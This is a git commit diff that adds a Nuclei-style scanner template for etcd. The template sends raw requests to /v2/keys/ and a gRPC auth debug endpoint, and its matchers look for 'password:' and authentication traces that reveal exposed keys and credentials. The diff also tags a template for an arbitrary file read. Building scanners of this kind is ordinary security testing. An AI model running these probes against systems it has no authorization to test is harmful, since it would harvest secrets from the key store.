add etcd.yaml 2022-12-05

hktalent · hktalent · commit c0ba421117fd · 2022-12-05T23:50:47.000+08:00
diff --git a/config/51pwn/etcd.yaml b/config/51pwn/etcd.yaml
@@ -0,0 +1,38 @@
+id: etcd_51pwn_api_leak
+info:
+  name: etcd_51pwn_api_leak
+  author:
+  - 51pwn
+  severity: Critical
+  description: |-
+    etcd_51pwn_api_leak
+    default port: 2379
+    the official etcd ports are 2379 for client requests and 2380 for peer communication
+  tags: etcd,web,leak
+requests:
+  - raw:
+      - |
+        GET /v2/keys/ HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /debug/requests?fam=grpc.Recv.Auth&b=0&exp=1 HTTP/1.1
+        Host: {{Hostname}}
+    matchers:
+      - type: word
+        condition: and
+        part: body
+        words:
+        - 'name:'
+        - 'password:'
+        - '.Auth/Authenticate'
+      - type: word
+        condition: and
+        part: body
+        words:
+        - '"nodes"'
+        - '"action"'
+        - '"dir"'
+        - '{'
+    matchers-condition: or
+    redirects: false
+  
diff --git a/config/51pwn/iiop.yaml b/config/51pwn/iiop.yaml
@@ -5,6 +5,7 @@ info:
   - 51pwn
   description: |-
     Arbitrary File Read on Skype For Business Server
+  tags: weblogic,web
 requests:
   - raw:
       - |
